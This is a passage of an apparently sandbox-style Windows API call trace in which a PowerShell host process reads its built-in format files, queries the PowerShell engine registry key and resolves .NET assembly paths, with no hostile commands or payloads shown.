	[0470.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d7848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d7848*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.967] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d7848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d7848*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.967] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d7848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d7848*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.968] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d7848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d7848*, lpNumberOfBytesRead=0x1ed0d8*=0xfb2, lpOverlapped=0x0) returned 1
	[0470.968] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d6f62, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d6f62*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0470.969] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d7848, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x34d7848*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0470.969] CloseHandle (hObject=0x2f8) returned 1
	[0470.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.969] SetErrorMode (uMode=0x1) returned 0x1
	[0470.969] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0470.969] SetErrorMode (uMode=0x1) returned 0x1
	[0470.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.969] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x2f8) returned 0x0
	[0470.970] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0470.970] CoTaskMemAlloc (cb=0x5a) returned 0x1b82f140
	[0470.970] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x1b82f140, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0470.970] CoTaskMemFree (pv=0x1b82f140) 
	[0470.970] RegCloseKey (hKey=0x2f8) returned 0x0
	[0470.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0470.972] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x39932ac1, Data2=0x5c2, Data3=0x456f, Data4=([0]=0x8c, [1]=0xff, [2]=0xf, [3]=0x7, [4]=0x31, [5]=0xb1, [6]=0x3b, [7]=0xd7))) returned 0x0
	[0470.974] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xc1f32abe, Data2=0xfc5d, Data3=0x4a46, Data4=([0]=0xa4, [1]=0x91, [2]=0xd0, [3]=0x8d, [4]=0xc7, [5]=0x73, [6]=0x20, [7]=0x43))) returned 0x0
	[0470.974] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x737a62c8, Data2=0xfaa6, Data3=0x4b5e, Data4=([0]=0xbb, [1]=0x64, [2]=0x29, [3]=0xdc, [4]=0xbf, [5]=0xa4, [6]=0xb8, [7]=0xb4))) returned 0x0
	[0470.974] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x70d30d9a, Data2=0x5ab1, Data3=0x429f, Data4=([0]=0x87, [1]=0x1, [2]=0xf9, [3]=0x52, [4]=0xde, [5]=0xfd, [6]=0x99, [7]=0xc9))) returned 0x0
	[0470.974] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xce43274a, Data2=0xd0ab, Data3=0x41d8, Data4=([0]=0xac, [1]=0x42, [2]=0x29, [3]=0x16, [4]=0x99, [5]=0x1a, [6]=0xae, [7]=0x1d))) returned 0x0
	[0470.974] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xbafdf787, Data2=0x3916, Data3=0x4ebe, Data4=([0]=0x99, [1]=0x7e, [2]=0x83, [3]=0x47, [4]=0x4c, [5]=0xb, [6]=0xc9, [7]=0xa))) returned 0x0
	[0470.975] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0470.975] GetFileType (hFile=0x2f8) returned 0x1
	[0470.975] SetErrorMode (uMode=0x1) returned 0x1
	[0470.975] GetFileType (hFile=0x2f8) returned 0x1
	[0470.975] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.976] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.977] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.977] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.977] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0470.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0xaca, lpOverlapped=0x0) returned 1
	[0470.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x3522bda, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3522bda*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0470.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x35235a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35235a8*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0470.978] CloseHandle (hObject=0x2f8) returned 1
	[0470.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.978] SetErrorMode (uMode=0x1) returned 0x1
	[0470.979] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0470.979] SetErrorMode (uMode=0x1) returned 0x1
	[0470.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.979] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x2f8) returned 0x0
	[0470.979] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0470.979] CoTaskMemAlloc (cb=0x5a) returned 0x1b82f140
	[0470.979] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x1b82f140, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0470.979] CoTaskMemFree (pv=0x1b82f140) 
	[0470.979] RegCloseKey (hKey=0x2f8) returned 0x0
	[0470.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0472.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0472.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0472.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0472.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.828] VirtualQuery (in: lpAddress=0x1ebc00, lpBuffer=0x1ecac0, dwLength=0x30 | out: lpBuffer=0x1ecac0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0475.829] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xc67b2b83, Data2=0x5f57, Data3=0x4085, Data4=([0]=0xba, [1]=0x56, [2]=0x5f, [3]=0x41, [4]=0xc1, [5]=0xa8, [6]=0x8e, [7]=0xb3))) returned 0x0
	[0475.830] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x7f64502d, Data2=0x480b, Data3=0x467e, Data4=([0]=0xa4, [1]=0xbf, [2]=0xe, [3]=0x88, [4]=0xaa, [5]=0x2b, [6]=0xc6, [7]=0x68))) returned 0x0
	[0475.831] VirtualQuery (in: lpAddress=0x1ebdb0, lpBuffer=0x1ecc70, dwLength=0x30 | out: lpBuffer=0x1ecc70*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0475.833] VirtualQuery (in: lpAddress=0x1ebdb0, lpBuffer=0x1ecc70, dwLength=0x30 | out: lpBuffer=0x1ecc70*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0475.834] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xf021d284, Data2=0xf1fb, Data3=0x4a4c, Data4=([0]=0x81, [1]=0xb0, [2]=0x30, [3]=0x65, [4]=0x1f, [5]=0xcf, [6]=0xcf, [7]=0x90))) returned 0x0
	[0475.839] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x1d00c375, Data2=0xdd42, Data3=0x4656, Data4=([0]=0x94, [1]=0xec, [2]=0xae, [3]=0x78, [4]=0x27, [5]=0xd5, [6]=0xf7, [7]=0xa3))) returned 0x0
	[0475.839] VirtualQuery (in: lpAddress=0x1ec000, lpBuffer=0x1ecec0, dwLength=0x30 | out: lpBuffer=0x1ecec0*(BaseAddress=0x1ec000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0475.840] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6f703379, Data2=0x1474, Data3=0x44cd, Data4=([0]=0xbd, [1]=0x4, [2]=0x97, [3]=0xd3, [4]=0x4c, [5]=0x71, [6]=0x11, [7]=0x95))) returned 0x0
	[0475.841] VirtualQuery (in: lpAddress=0x1eb670, lpBuffer=0x1ec530, dwLength=0x30 | out: lpBuffer=0x1ec530*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0475.841] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x371c5d18, Data2=0x9f7b, Data3=0x4c32, Data4=([0]=0xb3, [1]=0x7, [2]=0x9d, [3]=0xff, [4]=0xfc, [5]=0x1b, [6]=0xd7, [7]=0xbb))) returned 0x0
	[0475.842] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x2712917e, Data2=0xf0a3, Data3=0x4c8b, Data4=([0]=0xb2, [1]=0x85, [2]=0x71, [3]=0x35, [4]=0x41, [5]=0xec, [6]=0x76, [7]=0x4f))) returned 0x0
	[0476.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.510] SetErrorMode (uMode=0x1) returned 0x1
	[0476.510] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0476.510] GetFileType (hFile=0x320) returned 0x1
	[0476.510] SetErrorMode (uMode=0x1) returned 0x1
	[0476.510] GetFileType (hFile=0x320) returned 0x1
	[0476.510] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.511] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.512] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.512] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.512] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.513] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.513] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.513] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.514] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.514] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.514] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.514] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.514] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.515] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.515] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.515] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.516] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.516] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0xbce, lpOverlapped=0x0) returned 1
	[0476.517] ReadFile (in: hFile=0x320, lpBuffer=0x35d4d7e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d4d7e*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0476.517] ReadFile (in: hFile=0x320, lpBuffer=0x35d5648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x35d5648*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0476.517] CloseHandle (hObject=0x320) returned 1
	[0476.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.517] SetErrorMode (uMode=0x1) returned 0x1
	[0476.517] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0476.517] SetErrorMode (uMode=0x1) returned 0x1
	[0476.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.518] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x320) returned 0x0
	[0476.518] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0476.518] CoTaskMemAlloc (cb=0x5a) returned 0x4a6080
	[0476.518] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x4a6080, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0476.518] CoTaskMemFree (pv=0x4a6080) 
	[0476.518] RegCloseKey (hKey=0x320) returned 0x0
	[0476.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
